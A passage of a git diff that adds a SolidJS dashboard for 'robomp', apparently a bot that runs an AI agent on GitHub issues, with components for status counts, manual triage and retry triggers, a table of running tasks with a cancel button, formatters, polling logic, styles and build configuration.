+ ); +} diff --git a/python/robomp/web/src/components/Pill.tsx b/python/robomp/web/src/components/Pill.tsx new file mode 100644 index 000000000..ae0ff584f --- /dev/null +++ b/python/robomp/web/src/components/Pill.tsx @@ -0,0 +1,24 @@ +import type { JSX } from "solid-js"; + +export interface PillProps { + state?: string; + dot?: boolean; + title?: string; + class?: string; + children?: JSX.Element; +} + +export function Pill(props: PillProps): JSX.Element { + const className = (): string => { + const parts = ["pill"]; + if (props.state) parts.push(props.state); + if (props.dot) parts.push("dot"); + if (props.class) parts.push(props.class); + return parts.join(" "); + }; + return ( + + {props.children} + + ); +} diff --git a/python/robomp/web/src/components/Stats.tsx b/python/robomp/web/src/components/Stats.tsx new file mode 100644 index 000000000..b5cd6648e --- /dev/null +++ b/python/robomp/web/src/components/Stats.tsx @@ -0,0 +1,45 @@ +import { For, type JSX } from "solid-js"; + +import { statusResource } from "../state"; +import { EVENT_STATE_ORDER, type EventState } from "../types"; + +const ACCENT: Record = { + queued: "text-[#9ec9ff]", + running: "text-[#ffe26b]", + done: "text-[#7fe5a3]", + failed: "text-[#ff8e85]", + skipped: "text-ink-300", +}; + +export function Stats(): JSX.Element { + const counts = (): Record => { + const status = statusResource(); + if (!status) return { queued: 0, running: 0, done: 0, failed: 0, skipped: 0 }; + return status.issue_event_counts ?? status.event_counts; + }; + + return ( +
+ + {(state) => ( +
+ {state} + + {counts()[state] ?? 0} + +
+ )} +
+
+ ); +} diff --git a/python/robomp/web/src/components/Trigger.tsx b/python/robomp/web/src/components/Trigger.tsx new file mode 100644 index 000000000..3e5ff8206 --- /dev/null +++ b/python/robomp/web/src/components/Trigger.tsx @@ -0,0 +1,79 @@ +import { createSignal, type JSX, Show } from "solid-js"; + +import { CONFIG } from "../config"; +import { runTrigger, triggerStatus } from "../state"; +import { GlassCard } from "./GlassCard"; + +const STATUS_TONE = { + idle: "text-ink-400", + pending: "text-ink-200", + ok: "text-[#7fe5a3]", + err: "text-[#ff8e85]", +} as const; + +export function Trigger(): JSX.Element { + const [issue, setIssue] = createSignal(""); + + const validate = (): string | null => { + const value = issue().trim(); + if (!value) return "enter owner/repo#NN"; + return null; + }; + + const handleTriage = (): void => { + const value = issue().trim(); + if (!value) return; + void runTrigger({ mode: "triage", issue: value }); + }; + + const handleRetry = (): void => { + const value = issue().trim(); + if (!value) return; + void runTrigger({ mode: "retry", issue: value }); + }; + + return ( + owner/repo#NN}> + + trigger disabled. set ROBOMP_REPLAY_TOKEN in the server env to enable + manual triage and retry actions. + + } + > +
+
+ setIssue(ev.currentTarget.value)} + onKeyDown={(ev) => { + if (ev.key === "Enter") handleTriage(); + }} + class="flex-1 min-w-[220px] font-mono" + /> + + +
+ {validate() ?? "ready"} + } + > + + {triggerStatus().text} + + +
+
+
+ ); +} diff --git a/python/robomp/web/src/components/Working.tsx b/python/robomp/web/src/components/Working.tsx new file mode 100644 index 000000000..5e24c490b --- /dev/null +++ b/python/robomp/web/src/components/Working.tsx @@ -0,0 +1,160 @@ +import { For, type JSX, Show } from "solid-js"; + +import { CONFIG } from "../config"; +import { fmtAge, fmtDuration, shortDelivery, splitIssueKey } from "../format"; +import { runCancel, statusResource } from "../state"; +import type { RunningEvent } from "../types"; +import { GlassCard } from "./GlassCard"; +import { IssueLink } from "./IssueLink"; +import { Pill } from "./Pill"; + +interface Row { + key: string; + delivery_id: string; + issue_key: string | null; + event_type: string; + attempts: number; + model: string | null; + last_tool: string | null; + last_tool_ts: string | null; + started_at: string | null; + inflight_only: boolean; +} + +function rowsFor(running: RunningEvent[], inflight: string[]): Row[] { + const out: Row[] = []; + const seen = new Set(); + for (const e of running) { + const key = e.issue_key ?? e.delivery_id; + seen.add(key); + out.push({ + key, + delivery_id: e.delivery_id, + issue_key: e.issue_key, + event_type: e.event_type, + attempts: e.attempts, + model: e.model, + last_tool: e.last_tool, + last_tool_ts: e.last_tool_ts, + started_at: e.started_at ?? e.received_at, + inflight_only: false, + }); + } + for (const key of inflight) { + if (seen.has(key)) continue; + out.push({ + key, + delivery_id: "", + issue_key: key, + event_type: "", + attempts: 0, + model: null, + last_tool: null, + last_tool_ts: null, + started_at: null, + inflight_only: true, + }); + } + return out; +} + +async function cancelDelivery(deliveryId: string): Promise { + if ( + !window.confirm( + "Kill this running task? The omp subprocess dies and the row lands in 'failed'.", + ) + ) { + return; + } + await runCancel(deliveryId); +} + +function elapsed(startedAt: string | null): string { + if (!startedAt) return "—"; + const t = Date.parse(startedAt); + if (Number.isNaN(t)) return "—"; + return fmtDuration((Date.now() - t) / 1000); +} + +export function Working(): JSX.Element { + const rows = (): Row[] => { + const s = statusResource(); + return s ? rowsFor(s.running_events, s.inflight) : []; + }; + + return ( + {rows().length}}> + idle — waiting for events}> +
+ + + + + + + + + + + + + + {(r) => } + +
issueeventstateelapsedmodellast actionattempt +
+
+
+
+ ); +} + +function WorkingRow(props: { row: Row }): JSX.Element { + const ref = (): { repo: string; number: string } => splitIssueKey(props.row.issue_key); + return ( + + + {shortDelivery(props.row.delivery_id)}}> + + + + {props.row.event_type || "—"} + + + {props.row.inflight_only ? "inflight" : "running"} + + + {elapsed(props.row.started_at)} + + {props.row.model ? ( + {props.row.model} + ) : ( + — + )} + + + {props.row.last_tool ? ( + + {props.row.last_tool} + {fmtAge(props.row.last_tool_ts)} + + ) : ( + {props.row.inflight_only ? "held by pool" : "—"} + )} + + + {props.row.inflight_only ? "—" : `#${props.row.attempts}`} + + + —} + > + + + + + ); +} diff --git a/python/robomp/web/src/config.ts b/python/robomp/web/src/config.ts new file mode 100644 index 000000000..5c8278fa5 --- /dev/null +++ b/python/robomp/web/src/config.ts @@ -0,0 +1,38 @@ +// Configuration injected by FastAPI at request time. The server replaces the +// `__ROBOMP_CONFIG__` sentinel in `static/index.html` with a JSON blob so the +// SPA never needs to make an extra round-trip just to learn whether the +// trigger surface is enabled. + +export interface AppConfig { + replayEnabled: boolean; + replayToken: string; +} + +function readConfig(): AppConfig { + const node = document.getElementById("robomp-config"); + const text = node?.textContent?.trim(); + if (!text || text === "__ROBOMP_CONFIG__") { + return { replayEnabled: false, replayToken: "" }; + } + try { + const parsed: unknown = JSON.parse(text); + if (parsed === null || typeof parsed !== "object") { + return { replayEnabled: false, replayToken: "" }; + } + const record = parsed as Record; + return { + replayEnabled: Boolean(record.replayEnabled), + replayToken: typeof record.replayToken === "string" ? record.replayToken : "", + }; + } catch { + return { replayEnabled: false, replayToken: "" }; + } +} + +export const CONFIG: AppConfig = readConfig(); + +export const AUTH_HEADERS: Readonly> = CONFIG.replayEnabled + ? Object.freeze({ "X-Robomp-Replay-Token": CONFIG.replayToken }) + : Object.freeze({}); + +export const POLL_INTERVAL_MS = 3000; diff --git a/python/robomp/web/src/env.d.ts b/python/robomp/web/src/env.d.ts new file mode 100644 index 000000000..11f02fe2a --- /dev/null +++ b/python/robomp/web/src/env.d.ts @@ -0,0 +1 @@ +/// diff --git a/python/robomp/web/src/format.ts b/python/robomp/web/src/format.ts new file mode 100644 index 000000000..0125dd4e9 --- /dev/null +++ b/python/robomp/web/src/format.ts @@ -0,0 +1,57 @@ +// Compact, allocation-light formatters. All return `"—"` for empty / invalid +// inputs so the templates can stay terse. + +const DASH = "—"; + +export function fmtDuration(seconds?: number | null): string { + if (seconds == null || !Number.isFinite(seconds)) return DASH; + const s = Math.max(0, seconds); + if (s < 60) return `${Math.round(s)}s`; + if (s < 3600) return `${Math.floor(s / 60)}m ${Math.round(s % 60)}s`; + if (s < 86400) return `${Math.floor(s / 3600)}h ${Math.floor((s % 3600) / 60)}m`; + return `${Math.floor(s / 86400)}d ${Math.floor((s % 86400) / 3600)}h`; +} + +export function fmtAge(iso?: string | null): string { + if (!iso) return DASH; + const t = Date.parse(iso); + if (Number.isNaN(t)) return iso; + return `${fmtDuration((Date.now() - t) / 1000)} ago`; +} + +export function shortText(value: unknown, limit = 180): string { + const text = value == null ? "" : typeof value === "string" ? value : String(value); + return text.length > limit ? `${text.slice(0, limit - 1)}…` : text; +} + +export interface IssueRef { + repo: string; + number: string; +} + +export function splitIssueKey(key: string | null | undefined): IssueRef { + const k = key ?? ""; + const idx = k.lastIndexOf("#"); + if (idx === -1) return { repo: k, number: "" }; + return { repo: k.slice(0, idx), number: k.slice(idx + 1) }; +} + +export function issueUrl(repo: string, number: number | string): string { + return `https://github.com/${repo}/issues/${number}`; +} + +export function prUrl(repo: string, prNumber: number | string): string { + return `https://github.com/${repo}/pull/${prNumber}`; +} + +export function shortDelivery(id: string | null | undefined): string { + if (!id) return DASH; + return id.length > 8 ? id.slice(0, 8) : id; +} + +export function fmtTimestamp(iso?: string | null): string { + if (!iso) return ""; + // Drop the `T` separator and trailing `Z` so the log table looks like a + // single calm timestamp instead of an RFC-3339 dump. + return iso.replace("T", " ").replace("Z", ""); +} diff --git a/python/robomp/web/src/main.tsx b/python/robomp/web/src/main.tsx new file mode 100644 index 000000000..4b550bf26 --- /dev/null +++ b/python/robomp/web/src/main.tsx @@ -0,0 +1,11 @@ +import { render } from "solid-js/web"; + +import { App } from "./App"; +import "./styles/index.css"; + +const root = document.getElementById("app"); +if (!root) { + throw new Error("robomp dashboard: #app mount node missing"); +} + +render(() => , root); diff --git a/python/robomp/web/src/state.ts b/python/robomp/web/src/state.ts new file mode 100644 index 000000000..a94afc6f2 --- /dev/null +++ b/python/robomp/web/src/state.ts @@ -0,0 +1,115 @@ +import { createResource, createSignal, type ResourceReturn } from "solid-js"; + +import { ApiError, api } from "./api"; +import { POLL_INTERVAL_MS } from "./config"; +import type { LogsResponse, StatusResponse } from "./types"; + +// ────────────────────────────────────────────────────────────────────────── +// The dashboard polls two endpoints in lockstep every 3s. Each component +// reads from these resources directly so re-renders stay narrow. +// ────────────────────────────────────────────────────────────────────────── + +const statusFetcher = (): Promise => api.status(); +const logsFetcher = (): Promise => api.logs(400); + +const statusTuple: ResourceReturn = createResource(statusFetcher); +const logsTuple: ResourceReturn = createResource(logsFetcher); + +export const statusResource = statusTuple[0]; +export const logsResource = logsTuple[0]; + +const refetchStatus = statusTuple[1].refetch; +const refetchLogs = logsTuple[1].refetch; + +const [lastTickAt, setLastTickAt] = createSignal(Date.now()); +const [lastTickError, setLastTickError] = createSignal(null); +const [isFetching, setIsFetching] = createSignal(false); + +export { isFetching, lastTickAt, lastTickError }; + +let pollHandle: number | null = null; + +async function tick(): Promise { + setIsFetching(true); + try { + await Promise.all([refetchStatus(), refetchLogs()]); + setLastTickAt(Date.now()); + setLastTickError(null); + } catch (err) { + setLastTickError(err instanceof Error ? err.message : String(err)); + } finally { + setIsFetching(false); + } +} + +export function startPolling(): void { + if (pollHandle != null) return; + void tick(); + pollHandle = window.setInterval(() => { + void tick(); + }, POLL_INTERVAL_MS); +} + +export function stopPolling(): void { + if (pollHandle != null) { + window.clearInterval(pollHandle); + pollHandle = null; + } +} + +// ────────────────────────────────────────────────────────────────────────── +// Trigger + cancel — shared status surface so every entry point (form, +// retry buttons, browse list) feeds the same status line. +// ────────────────────────────────────────────────────────────────────────── + +export type TriggerStatusKind = "idle" | "pending" | "ok" | "err"; + +export interface TriggerStatus { + kind: TriggerStatusKind; + text: string; +} + +const [triggerStatus, setTriggerStatus] = createSignal({ + kind: "idle", + text: "", +}); + +export { triggerStatus }; + +export interface TriggerInput { + mode: "triage" | "retry"; + issue?: string; + delivery_id?: string; +} + +export async function runTrigger(input: TriggerInput): Promise { + setTriggerStatus({ kind: "pending", text: "queuing…" }); + try { + const data = await api.trigger(input); + setTriggerStatus({ + kind: "ok", + text: `queued ${data.mode ?? input.mode}: ${data.delivery}`, + }); + } catch (err) { + const detail = err instanceof ApiError ? err.message : String(err); + const status = err instanceof ApiError ? `error ${err.status}` : "error"; + setTriggerStatus({ kind: "err", text: `${status}: ${detail}` }); + } + void tick(); +} + +export async function runCancel(deliveryId: string): Promise { + setTriggerStatus({ kind: "pending", text: `cancelling ${deliveryId.slice(0, 8)}…` }); + try { + const data = await api.cancel(deliveryId); + setTriggerStatus({ + kind: "ok", + text: `cancel signaled: ${deliveryId.slice(0, 8)} (fired=${data.fired})`, + }); + } catch (err) { + const detail = err instanceof ApiError ? err.message : String(err); + const status = err instanceof ApiError ? `cancel ${err.status}` : "cancel"; + setTriggerStatus({ kind: "err", text: `${status}: ${detail}` }); + } + void tick(); +} diff --git a/python/robomp/web/src/styles/index.css b/python/robomp/web/src/styles/index.css new file mode 100644 index 000000000..56cec5267 --- /dev/null +++ b/python/robomp/web/src/styles/index.css @@ -0,0 +1,551 @@ +@import "tailwindcss"; + +/* ────────────────────────────────────────────────────────────────────────── + Design tokens. Exposed both as plain CSS variables (for raw `var()` use) + and as Tailwind theme keys so utilities like `bg-surface-1`, `text-ink-100`, + `border-stroke` work without a separate config file. + ────────────────────────────────────────────────────────────────────────── */ +@theme { + --font-sans: + -apple-system, BlinkMacSystemFont, "SF Pro Text", "SF Pro Display", + "Inter", system-ui, sans-serif; + --font-mono: + ui-monospace, "SF Mono", Menlo, Consolas, monospace; + + --color-ink-50: #f8fafc; + --color-ink-100: #e8eaef; + --color-ink-200: #c6cad3; + --color-ink-300: #8b94a1; + --color-ink-400: #5e6772; + --color-ink-500: #3a4049; + --color-ink-700: #1c2026; + --color-ink-800: #14171d; + --color-ink-900: #0a0c11; + --color-ink-950: #07090c; + + --color-surface-1: rgba(255, 255, 255, 0.045); + --color-surface-2: rgba(255, 255, 255, 0.075); + --color-surface-3: rgba(255, 255, 255, 0.11); + --color-stroke: rgba(255, 255, 255, 0.10); + --color-stroke-soft: rgba(255, 255, 255, 0.06); + + --color-accent: #0a84ff; + --color-accent-2: #5aa9ff; + --color-ok: #30d158; + --color-warn: #ffd60a; + --color-err: #ff453a; + --color-info: #64d2ff; + + --radius-md: 12px; + --radius-lg: 16px; + --radius-xl: 22px; + --radius-2xl: 28px; + + --shadow-glass: + 0 24px 60px -20px rgba(0, 0, 0, 0.55), + 0 8px 24px -12px rgba(0, 0, 0, 0.35), + inset 0 1px 0 rgba(255, 255, 255, 0.04); + --shadow-soft: 0 8px 24px -12px rgba(0, 0, 0, 0.45); + + --blur-glass: blur(32px) saturate(180%); +} + +/* ────────────────────────────────────────────────────────────────────────── + Root + page chrome. The body gradient sits behind every glass card. + ────────────────────────────────────────────────────────────────────────── */ +:root { + color-scheme: dark; +} + +html, +body, +#app { + min-height: 100%; + margin: 0; + background-color: var(--color-ink-950); + color: var(--color-ink-100); + font-family: var(--font-sans); + font-feature-settings: "ss01", "ss03", "cv11"; + -webkit-font-smoothing: antialiased; + text-rendering: optimizeLegibility; +} + +body { + background: + radial-gradient( + 120vw 70vh at 88% -12%, + rgba(10, 132, 255, 0.18), + transparent 60% + ), + radial-gradient( + 90vw 60vh at -10% 110%, + rgba(100, 210, 255, 0.10), + transparent 60% + ), + radial-gradient(60vw 40vh at 50% 50%, rgba(20, 24, 36, 0.45), transparent 70%), + linear-gradient(180deg, #05070a 0%, #090c12 55%, #050608 100%); + background-attachment: fixed; +} + +#app { + display: flex; + flex-direction: column; +} + +::selection { + background: rgba(10, 132, 255, 0.45); + color: #fff; +} + +a { + color: var(--color-accent-2); + text-decoration: none; + transition: color 150ms ease-out; +} +a:hover { + color: #9ec9ff; +} + +/* ────────────────────────────────────────────────────────────────────────── + Reusable utility classes layered on top of Tailwind. + ────────────────────────────────────────────────────────────────────────── */ +.glass { + background: var(--color-surface-1); + backdrop-filter: var(--blur-glass); + -webkit-backdrop-filter: var(--blur-glass); + border: 1px solid var(--color-stroke); + box-shadow: var(--shadow-glass); +} + +.glass-flat { + background: var(--color-surface-1); + border: 1px solid var(--color-stroke); +} + +.hairline { + border-color: var(--color-stroke-soft); +} + +.tabular { + font-variant-numeric: tabular-nums; +} + +.eyebrow { + font-size: 10.5px; + letter-spacing: 0.16em; + text-transform: uppercase; + color: var(--color-ink-300); +} + +/* ────────────────────────────────────────────────────────────────────────── + Pills — capsule status tags, tabular, hairline outline. Tints are flat + (no glow); the only colour is the text + a hairline border. + ────────────────────────────────────────────────────────────────────────── */ +.pill { + display: inline-flex; + align-items: center; + gap: 4px; + padding: 2px 8px; + border-radius: 999px; + font-size: 11px; + font-weight: 500; + letter-spacing: 0.02em; + border: 1px solid var(--color-stroke); + background: rgba(255, 255, 255, 0.04); + color: var(--color-ink-200); + white-space: nowrap; + font-variant-numeric: tabular-nums; +} +.pill.queued { + color: #9ec9ff; + border-color: rgba(100, 175, 255, 0.32); + background: rgba(10, 132, 255, 0.10); +} +.pill.running { + color: #ffe26b; + border-color: rgba(255, 214, 10, 0.32); + background: rgba(255, 214, 10, 0.08); +} +.pill.done { + color: #7fe5a3; + border-color: rgba(48, 209, 88, 0.32); + background: rgba(48, 209, 88, 0.08); +} +.pill.failed { + color: #ff8e85; + border-color: rgba(255, 69, 58, 0.36); + background: rgba(255, 69, 58, 0.08); +} +.pill.skipped { + color: var(--color-ink-300); + border-color: rgba(255, 255, 255, 0.10); + background: rgba(255, 255, 255, 0.03); +} +.pill.open { + color: #9ec9ff; + border-color: rgba(100, 175, 255, 0.32); + background: rgba(10, 132, 255, 0.08); +} +.pill.closed { + color: #d8b4ff; + border-color: rgba(186, 130, 255, 0.32); + background: rgba(186, 130, 255, 0.08); +} +.pill.dot::before { + content: ""; + width: 6px; + height: 6px; + border-radius: 999px; + background: currentColor; + display: inline-block; +} + +/* Pulsing dot for running pills. */ +.pill.running.dot::before { + animation: pulse-dot 1.8s ease-in-out infinite; +} +@keyframes pulse-dot { + 0%, 100% { opacity: 1; transform: scale(1); } + 50% { opacity: 0.55; transform: scale(0.75); } +} + +/* ────────────────────────────────────────────────────────────────────────── + Buttons. + ────────────────────────────────────────────────────────────────────────── */ +button, +.btn { + display: inline-flex; + align-items: center; + justify-content: center; + gap: 6px; + font: inherit; + font-weight: 500; + padding: 7px 14px; + border-radius: 10px; + border: 1px solid var(--color-stroke); + background: var(--color-surface-1); + color: var(--color-ink-100); + cursor: pointer; + transition: + background 150ms ease-out, + border-color 150ms ease-out, + color 150ms ease-out, + transform 80ms ease-out; + user-select: none; +} +button:hover:not(:disabled), +.btn:hover:not(:disabled) { + background: var(--color-surface-2); + border-color: rgba(255, 255, 255, 0.18); +} +button:active:not(:disabled), +.btn:active:not(:disabled) { + transform: translateY(1px); +} +button:disabled, +.btn:disabled { + opacity: 0.45; + cursor: not-allowed; +} +button.primary, +.btn.primary { + background: linear-gradient(180deg, #1f95ff 0%, #0a84ff 100%); + border-color: rgba(10, 132, 255, 0.7); + color: #fff; + box-shadow: + 0 6px 16px -6px rgba(10, 132, 255, 0.55), + inset 0 1px 0 rgba(255, 255, 255, 0.18); +} +button.primary:hover:not(:disabled), +.btn.primary:hover:not(:disabled) { + background: linear-gradient(180deg, #34a0ff 0%, #1d8eff 100%); +} +button.ghost, +.btn.ghost { + background: transparent; + border-color: transparent; + color: var(--color-ink-300); +} +button.ghost:hover:not(:disabled), +.btn.ghost:hover:not(:disabled) { + background: var(--color-surface-1); + color: var(--color-ink-100); + border-color: var(--color-stroke); +} +button.danger, +.btn.danger { + color: #ff8e85; + border-color: rgba(255, 69, 58, 0.32); + background: rgba(255, 69, 58, 0.08); +} +button.danger:hover:not(:disabled), +.btn.danger:hover:not(:disabled) { + background: rgba(255, 69, 58, 0.16); + border-color: rgba(255, 69, 58, 0.6); + color: #ffb1a8; +} +button.tiny, +.btn.tiny { + padding: 3px 9px; + font-size: 11.5px; + border-radius: 8px; +} + +/* ────────────────────────────────────────────────────────────────────────── + Form controls. + ────────────────────────────────────────────────────────────────────────── */ +input[type="text"], +input[type="search"], +input[type="password"], +select { + font: inherit; + background: rgba(0, 0, 0, 0.28); + color: var(--color-ink-100); + border: 1px solid var(--color-stroke); + border-radius: 10px; + padding: 7px 11px; + outline: none; + transition: + border-color 150ms ease-out, + background 150ms ease-out, + box-shadow 150ms ease-out; +} +input[type="text"]::placeholder, +input[type="search"]::placeholder { + color: var(--color-ink-400); +} +input[type="text"]:focus, +input[type="search"]:focus, +input[type="password"]:focus, +select:focus { + border-color: rgba(10, 132, 255, 0.55); + box-shadow: 0 0 0 3px rgba(10, 132, 255, 0.16); +} +select { + appearance: none; + background-image: + linear-gradient(45deg, transparent 50%, var(--color-ink-300) 50%), + linear-gradient(135deg, var(--color-ink-300) 50%, transparent 50%); + background-position: + calc(100% - 18px) calc(50% - 2px), + calc(100% - 13px) calc(50% - 2px); + background-size: 5px 5px, 5px 5px; + background-repeat: no-repeat; + padding-right: 30px; +} +input[type="checkbox"] { + accent-color: var(--color-accent); +} + +/* ────────────────────────────────────────────────────────────────────────── + Tables. + ────────────────────────────────────────────────────────────────────────── */ +table.t { + width: 100%; + border-collapse: separate; + border-spacing: 0; + font-variant-numeric: tabular-nums; + font-size: 13px; +} +table.t thead th { + text-align: left; + font-size: 10.5px; + font-weight: 500; + letter-spacing: 0.14em; + text-transform: uppercase; + color: var(--color-ink-400); + padding: 9px 14px; + border-bottom: 1px solid var(--color-stroke); + background: rgba(255, 255, 255, 0.015); + white-space: nowrap; +} +table.t tbody td { + padding: 9px 14px; + border-bottom: 1px solid var(--color-stroke-soft); + vertical-align: top; + color: var(--color-ink-100); +} +table.t tbody tr { + transition: background 120ms ease-out; +} +table.t tbody tr:hover td { + background: rgba(255, 255, 255, 0.025); +} +table.t tbody tr:last-child td { + border-bottom: none; +} +table.t td .meta-line { + display: block; + margin-top: 2px; + color: var(--color-ink-400); + font-size: 11px; +} +.err-cell { + color: #ffa39c; + white-space: pre-wrap; + word-break: break-word; + max-width: 460px; + font-size: 12px; +} + +/* ────────────────────────────────────────────────────────────────────────── + Code chips inline. + ────────────────────────────────────────────────────────────────────────── */ +code, +.code { + font-family: var(--font-mono); + font-size: 11.5px; + background: rgba(255, 255, 255, 0.05); + border: 1px solid var(--color-stroke-soft); + padding: 1px 6px; + border-radius: 6px; + color: var(--color-ink-200); +} + +/* ────────────────────────────────────────────────────────────────────────── + Scrollbar styling on opt-in containers. + ────────────────────────────────────────────────────────────────────────── */ +.scrollable { + scrollbar-width: thin; + scrollbar-color: rgba(255, 255, 255, 0.12) transparent; +} +.scrollable::-webkit-scrollbar { + width: 8px; + height: 8px; +} +.scrollable::-webkit-scrollbar-track { + background: transparent; +} +.scrollable::-webkit-scrollbar-thumb { + background: rgba(255, 255, 255, 0.08); + border-radius: 999px; +} +.scrollable::-webkit-scrollbar-thumb:hover { + background: rgba(255, 255, 255, 0.18); +} + +/* ────────────────────────────────────────────────────────────────────────── + Log viewer. + ────────────────────────────────────────────────────────────────────────── */ +.logs { + font-family: var(--font-mono); + font-size: 11.5px; + line-height: 1.55; + max-height: 60vh; + overflow: auto; +} +.log-row { + display: grid; + grid-template-columns: 80px 60px 160px 1fr; + gap: 12px; + padding: 4px 16px; + border-bottom: 1px solid var(--color-stroke-soft); + align-items: baseline; +} +.log-row:hover { + background: rgba(255, 255, 255, 0.025); +} +.log-row .ts { + color: var(--color-ink-400); + white-space: nowrap; +} +.log-row .lvl { + font-weight: 600; + letter-spacing: 0.04em; +} +.log-row .logger { + color: var(--color-ink-400); + white-space: nowrap; + overflow: hidden; + text-overflow: ellipsis; +} +.log-row .msg { + white-space: pre-wrap; + word-break: break-word; + color: var(--color-ink-100); +} +.log-row .extras { + color: var(--color-ink-300); + margin-left: 6px; +} +.log-row .extras b { + color: var(--color-ink-200); + font-weight: 500; +} +.log-row .exc { + color: #ffa39c; + white-space: pre-wrap; + display: block; + margin-top: 4px; +} +.lvl.INFO { color: #6fb0ff; } +.lvl.DEBUG { color: var(--color-ink-400); } +.lvl.WARNING { color: #ffd66b; } +.lvl.ERROR { color: #ff8e85; } +.lvl.RAW { color: var(--color-ink-400); } + +/* ────────────────────────────────────────────────────────────────────────── + Reveal animation for the dashboard's first paint. Honour reduced motion. + ────────────────────────────────────────────────────────────────────────── */ +@keyframes glass-rise { + from { + opacity: 0; + transform: translateY(8px); + } + to { + opacity: 1; + transform: translateY(0); + } +} +.glass-rise { + animation: glass-rise 360ms cubic-bezier(0.16, 1, 0.3, 1) both; +} + +@media (prefers-reduced-motion: reduce) { + *, + *::before, + *::after { + animation-duration: 0.001ms !important; + animation-iteration-count: 1 !important; + transition-duration: 0.001ms !important; + } +} + +/* Tighter form rows. */ +.form-row { + display: flex; + flex-wrap: wrap; + align-items: center; + gap: 10px; +} + +/* Card section heading. */ +.section-heading { + display: flex; + align-items: baseline; + justify-content: space-between; + gap: 16px; + padding: 14px 18px 10px 18px; +} +.section-heading h2 { + font-size: 11px; + font-weight: 500; + letter-spacing: 0.18em; + text-transform: uppercase; + color: var(--color-ink-300); + margin: 0; +} +.section-heading .accessory { + font-size: 11px; + color: var(--color-ink-400); + display: flex; + align-items: center; + gap: 10px; +} + +.empty { + padding: 24px; + color: var(--color-ink-400); + font-style: italic; + text-align: center; +} diff --git a/python/robomp/web/src/types.ts b/python/robomp/web/src/types.ts new file mode 100644 index 000000000..fc9bc2f49 --- /dev/null +++ b/python/robomp/web/src/types.ts @@ -0,0 +1,161 @@ +// Mirrors the JSON shapes emitted by `src/server.py`. Kept narrow on +// purpose: anything `unknown` here is something the backend explicitly does +// not promise to keep stable. + +export type EventState = "queued" | "running" | "done" | "failed" | "skipped"; + +export type IssueState = + | "new" + | "reproducing" + | "fixing" + | "opened" + | "merged" + | "closed" + | "abandoned"; + +export interface RuntimeInfo { + bot_login: string; + repo_allowlist: string[]; + max_concurrency: number; + model: string; + thinking_level: string; + uptime_seconds: number; +} + +export interface LatestEvent { + delivery_id: string; + event_type: string; + state: EventState; + attempts: number; + received_at: string; + last_error: string | null; +} + +export interface IssueRow { + key: string; + repo: string; + number: number; + branch: string | null; + pr_number: number | null; + state: IssueState | string; + classification: string | null; + updated_at: string; + latest_event: LatestEvent | null; +} + +export interface RunningEvent { + delivery_id: string; + event_type: string; + repo: string | null; + issue_key: string | null; + received_at: string; + started_at: string | null; + attempts: number; + model: string | null; + last_tool: string | null; + last_tool_ts: string | null; +} + +export interface RecentEvent { + delivery_id: string; + event_type: string; + repo: string | null; + issue_key: string | null; + state: EventState; + attempts: number; + received_at: string; + last_error: string | null; +} + +export interface StatusResponse { + runtime: RuntimeInfo; + event_counts: Record; + issue_event_counts: Record; + running_events: RunningEvent[]; + inflight: string[]; + issues: IssueRow[]; + recent_events: RecentEvent[]; +} + +// Log entries carry arbitrary structured extras. We expose the known fields +// with concrete types and leave unknown extras as `unknown` so callers must +// narrow before using. +export interface LogEntry { + ts?: string; + level?: string; + logger?: string; + msg?: string; + exc?: string; + [key: string]: unknown; +} + +export interface LogsResponse { + entries: LogEntry[]; + count: number; + limit: number; +} + +export interface BrowseIssue { + repo: string; + number: number; + title: string; + state: "open" | "closed"; + author: string; + labels: string[]; + comments: number; + updated_at: string; + created_at: string; + html_url: string; + processed: boolean; +} + +export interface BrowseError { + repo: string; + error: string; +} + +export interface BrowseCacheMeta { + hit: boolean; + fetched_at: number; +} + +export interface BrowseResponse { + issues: BrowseIssue[]; + errors: BrowseError[]; + repos: string[]; + cache: BrowseCacheMeta; +} + +export interface TriggerResponse { + delivery: string; + state: string; + mode?: string; +} + +export interface CancelResponse { + delivery: string; + fired: boolean; + previous_state: string; +} + +export const TERMINAL_ISSUE_STATES: ReadonlySet = new Set([ + "merged", + "closed", + "abandoned", +]); + +export const LEVEL_ORDER: Readonly> = { + DEBUG: 10, + INFO: 20, + WARNING: 30, + ERROR: 40, + RAW: 20, +}; + +export const EVENT_STATE_ORDER: readonly EventState[] = [ + "queued", + "running", + "done", + "failed", + "skipped", +]; diff --git a/python/robomp/web/tsconfig.json b/python/robomp/web/tsconfig.json new file mode 100644 index 000000000..cfa29bc15 --- /dev/null +++ b/python/robomp/web/tsconfig.json @@ -0,0 +1,24 @@ +{ + "compilerOptions": { + "target": "ES2022", + "module": "ESNext", + "moduleResolution": "Bundler", + "lib": ["ES2022", "DOM", "DOM.Iterable"], + "strict": true, + "noImplicitAny": true, + "noUnusedLocals": true, + "noUnusedParameters": true, + "noFallthroughCasesInSwitch": true, + "exactOptionalPropertyTypes": false, + "jsx": "preserve", + "jsxImportSource": "solid-js", + "noEmit": true, + "isolatedModules": true, + "esModuleInterop": true, + "skipLibCheck": true, + "allowSyntheticDefaultImports": true, + "useDefineForClassFields": true, + "types": ["vite/client", "bun"] + }, + "include": ["src/**/*", "vite.config.ts"] +} diff --git a/python/robomp/web/vite.config.ts b/python/robomp/web/vite.config.ts new file mode 100644 index 000000000..4a6c2c9ef --- /dev/null +++ b/python/robomp/web/vite.config.ts @@ -0,0 +1,75 @@ +import { cpSync, existsSync, mkdirSync, readdirSync, rmSync, statSync } from "node:fs"; +import path from "node:path"; +import { fileURLToPath } from "node:url"; +import tailwindcss from "@tailwindcss/vite"; +import { defineConfig, type Plugin } from "vite"; +import solid from "vite-plugin-solid"; + +const dirname = path.dirname(fileURLToPath(import.meta.url)); + +// Vite writes the bundle into `web/dist/`. After the rollup stage finishes we +// fan the output out into the Python package directory (`src/static/`) +// so FastAPI can mount it directly. Done in a Vite plugin so both `bun run +// web:build` and the Docker `web-builder` stage produce an installable layout +// without any extra shell glue. +const outDir = path.resolve(dirname, "dist"); +const staticDir = path.resolve(dirname, "..", "src", "static"); + +const PRESERVED_FILES: ReadonlySet = new Set([".gitkeep"]); + +function syncStaticBundle(): Plugin { + return { + name: "robomp-sync-static", + apply: "build", + closeBundle() { + if (!existsSync(staticDir)) { + mkdirSync(staticDir, { recursive: true }); + } + + // Clear out previous build output but keep the committed stub anchors + // (`.gitkeep`). The build is about to write fresh `index.html` and + // `assets/`, so any stale file in there is dead weight. + for (const entry of readdirSync(staticDir)) { + if (PRESERVED_FILES.has(entry)) continue; + const target = path.join(staticDir, entry); + const stats = statSync(target); + rmSync(target, { recursive: 